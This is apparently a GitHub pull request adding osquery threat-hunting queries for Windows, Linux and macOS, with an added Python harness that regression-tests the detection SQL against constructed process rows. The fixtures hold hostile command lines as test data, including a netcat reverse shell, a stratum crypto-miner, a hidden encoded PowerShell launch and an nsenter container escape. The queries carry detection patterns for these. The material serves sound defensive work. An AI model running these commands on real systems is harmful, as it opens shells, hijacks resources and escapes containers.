    -- Hidden process names
    OR p.name LIKE '.%'
    -- Running from memory
    OR p.on_disk = 0
    -- Crypto-miner indicators (T1496 Resource Hijacking)
    OR p.cmdline LIKE '%stratum%'
    OR p.cmdline LIKE '%xmr%'
    OR p.cmdline LIKE '%monero%'
    OR p.cmdline LIKE '%nicehash%'
    OR p.cmdline LIKE '%pool.%mining%'
    OR p.cmdline LIKE '%cryptonight%'
    OR p.cmdline LIKE '%randomx%'
    -- Root processes from unusual locations
    OR (p.uid = 0 AND p.path NOT LIKE '/usr/%' AND p.path NOT LIKE '/sbin/%' AND p.path NOT LIKE '/bin/%' AND p.path NOT LIKE '/System/%' AND p.path NOT LIKE '/Applications/%' AND p.path NOT LIKE '/Library/%')
);

This PR was AI assisted with Claude Code

Adds comprehensive process listing saved queries with full forensic context:
- Windows: process_listing_windows_elastic with parent chain, authenticode, hashes
- Linux: process_listing_linux_elastic with parent chain, hashes, username
- macOS: process_listing_macos_elastic with parent chain, code signatures, hashes

All queries include ECS field mappings and VirusTotal hash lookup links.

Adds threat hunting queries to identify potentially malicious processes:
- Windows: LOLBins, unsigned executables, unusual parent-child relationships
- Linux: Reverse shells, crypto-miners, container escapes, suspicious paths
- macOS: Unsigned binaries, osascript abuse, quarantine bypass, hidden processes

MITRE ATT&CK coverage: T1059, T1218, T1036, T1105, T1496, T1553.001, T1611

All queries include ECS field mappings and detection reason classification.

Documents new process listing artifact (#27) with 6 queries:
- 27: Process listing (Windows)
- 27a: Process listing (Linux)
- 27b: Process listing (macOS)
- 27c: Suspicious processes (Windows)
- 27d: Suspicious processes (Linux)
- 27e: Suspicious processes (macOS)
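An added example, not part of this PR or of the osquery_manager integration: a small Python harness that runs trimmed versions of the Windows and Linux suspicious-process logic from the description above against constructed process rows in SQLite, which is the engine osquery executes its queries with, so a detection change can be regression-tested offline before it ships. The fixture rows, the `'missing'` authenticode result for an unsigned file, and the tightened nsenter predicate (flag only when spawned from an interactive shell) are this example's assumptions, not the PR's. It also exercises two SQLite behaviours the queries depend on: string literals do not unescape backslashes, so a `'C:\\Windows\\%'` pattern never matches a real path, and `NULL NOT IN (...)` is not true, so a parent check on `pp.name` silently drops processes whose parent has already exited unless `IS NULL` is tested explicitly.

```python
"""Offline regression harness for osquery-style suspicious-process SQL (SQLite semantics)."""
import sqlite3

# Constructed fixtures, not real telemetry: pid, name, path, cmdline, parent, uid, on_disk
WIN_PROCESSES = [
    (100, "svchost.exe", r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs", 4, 0, 1),
    (200, "explorer.exe", r"C:\Windows\explorer.exe", "explorer.exe", 100, 0, 1),
    (400, "updater.exe", r"C:\Users\alice\AppData\Local\Temp\updater.exe", "updater.exe", 200, 0, 1),
    (500, "powershell.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe -nop -w hidden -enc SQBFAFgA", 400, 0, 1),
    (600, "fodhelper.exe", r"C:\Windows\System32\fodhelper.exe", "fodhelper.exe", 9999, 0, 1),  # parent gone
]
# path, result. Assumption: osquery reports an unsigned file with a non-NULL, non-'trusted'
# result such as 'missing'; NULL only appears when no authenticode row joins at all.
WIN_AUTHENTICODE = [
    (r"C:\Windows\System32\svchost.exe", "trusted"),
    (r"C:\Windows\explorer.exe", "trusted"),
    (r"C:\Users\alice\AppData\Local\Temp\updater.exe", "missing"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "trusted"),
]
LINUX_PROCESSES = [
    (1, "systemd", "/usr/lib/systemd/systemd", "/sbin/init", 0, 0, 1),
    (1200, "bash", "/usr/bin/bash", "bash", 1, 1000, 1),
    (1300, "nc", "/usr/bin/nc", "nc 10.0.0.5 4444 -e /bin/sh", 1200, 1000, 1),
    (1400, "kworker", "/tmp/.x/kworker", "./kworker -o stratum+tcp://pool.example:3333", 1, 0, 1),
    (1500, "containerd-shim", "/usr/bin/containerd-shim-runc-v2", "containerd-shim-runc-v2 -namespace moby", 1, 0, 1),
    (1600, "nsenter", "/usr/bin/nsenter", "nsenter --target 1 --mount --pid -- sh", 1200, 1000, 1),
    (1700, "nsenter", "/usr/bin/nsenter", "nsenter --target 1 --net -- ip link", 1500, 0, 1),  # runtime helper
]

# Trimmed Windows checks. Paths use single backslashes: SQLite literals do not unescape '\\'.
WIN_QUERY = r"""
SELECT p.pid,
  CASE
    WHEN a.result IS NOT NULL AND a.result != 'trusted' THEN 'untrusted_signature'
    WHEN a.result IS NULL AND p.path NOT LIKE 'C:\Windows\%' THEN 'unsigned_non_system'
    WHEN p.name IN ('powershell.exe', 'pwsh.exe')
         AND (p.cmdline LIKE '%-enc %' OR p.cmdline LIKE '%hidden%') THEN 'powershell_suspicious_args'
    -- pp.name is NULL for an orphan and NULL NOT IN (...) is not true, so test it explicitly
    WHEN p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe')
         AND (pp.name IS NULL OR pp.name NOT IN ('explorer.exe', 'svchost.exe')) THEN 'uac_bypass_tool'
    ELSE 'other_suspicious'
  END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
LEFT JOIN authenticode a ON p.path = a.path
WHERE (a.result IS NOT NULL AND a.result != 'trusted')
   OR (a.result IS NULL AND p.path NOT LIKE 'C:\Windows\%')
   OR (p.name IN ('powershell.exe', 'pwsh.exe') AND (p.cmdline LIKE '%-enc %' OR p.cmdline LIKE '%hidden%'))
   OR (p.name IN ('eventvwr.exe', 'fodhelper.exe', 'computerdefaults.exe', 'sdclt.exe')
       AND (pp.name IS NULL OR pp.name NOT IN ('explorer.exe', 'svchost.exe')))
"""

# Trimmed Linux checks. The nsenter predicate is tightened here (this example's choice, not the
# PR's): flag it only from an interactive shell, since container runtimes call nsenter routinely.
# CASE yields the first matching branch, so pid 1400 is labelled by its path, not as a miner.
LINUX_QUERY = """
SELECT p.pid,
  CASE
    WHEN p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%' THEN 'suspicious_path_tmp'
    WHEN p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %') THEN 'netcat_shell'
    WHEN p.cmdline LIKE '%stratum%' THEN 'crypto_miner'
    WHEN p.cmdline LIKE '%nsenter%--target 1%' AND pp.name IN ('bash', 'sh', 'zsh') THEN 'container_escape'
    ELSE 'other_suspicious'
  END AS detection_reason
FROM processes p
LEFT JOIN processes pp ON p.parent = pp.pid
WHERE p.path LIKE '/tmp/%' OR p.path LIKE '/var/tmp/%'
   OR (p.cmdline LIKE '%nc %' AND (p.cmdline LIKE '%-e %' OR p.cmdline LIKE '%-c %'))
   OR p.cmdline LIKE '%stratum%'
   OR (p.cmdline LIKE '%nsenter%--target 1%' AND pp.name IN ('bash', 'sh', 'zsh'))
"""


def run(query, processes, authenticode=()):
    """Load fixture rows into in-memory SQLite and return {pid: detection_reason}."""
    con = sqlite3.connect(":memory:")
    # osquery provides concat(); stock SQLite does not. Registered so the PR's full queries,
    # which build vt_link with it, also run here once a hash table is added to the schema.
    con.create_function("concat", -1, lambda *a: "".join("" if x is None else str(x) for x in a))
    con.execute("CREATE TABLE processes (pid INT, name TEXT, path TEXT, cmdline TEXT, parent INT, uid INT, on_disk INT)")
    con.execute("CREATE TABLE authenticode (path TEXT, result TEXT)")
    con.executemany("INSERT INTO processes VALUES (?,?,?,?,?,?,?)", processes)
    con.executemany("INSERT INTO authenticode VALUES (?,?)", authenticode)
    return dict(con.execute(query).fetchall())


def sql_like(pattern, value):
    """Evaluate value LIKE pattern exactly as SQLite (and therefore osquery) does."""
    return bool(sqlite3.connect(":memory:").execute("SELECT ? LIKE ?", (value, pattern)).fetchone()[0])


if __name__ == "__main__":
    print("doubled-backslash pattern matches:", sql_like(r"C:\\Windows\\%", r"C:\Windows\explorer.exe"))
    print(run(WIN_QUERY, WIN_PROCESSES, WIN_AUTHENTICODE))
    print(run(LINUX_QUERY, LINUX_PROCESSES))
```

To test the PR's full queries unchanged, extend the schema with the `hash`, `users` and `signature` columns they select and paste the query text in; the `concat` shim is already registered for `vt_link`. Adding a fixture row for every `detection_reason` branch turns the harness into a table-driven test that fails the moment a pattern edit stops matching.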
@tomsonpl tomsonpl changed the base branch from main to temporary-osquery-artifacts-branch December 2, 2025 12:39
@elasticmachine commented: 💚 Build Succeeded

@andrewkroh andrewkroh added documentation Improvements or additions to documentation. Applied to PRs that modify *.md files. Integration:osquery_manager Osquery Manager labels Dec 2, 2025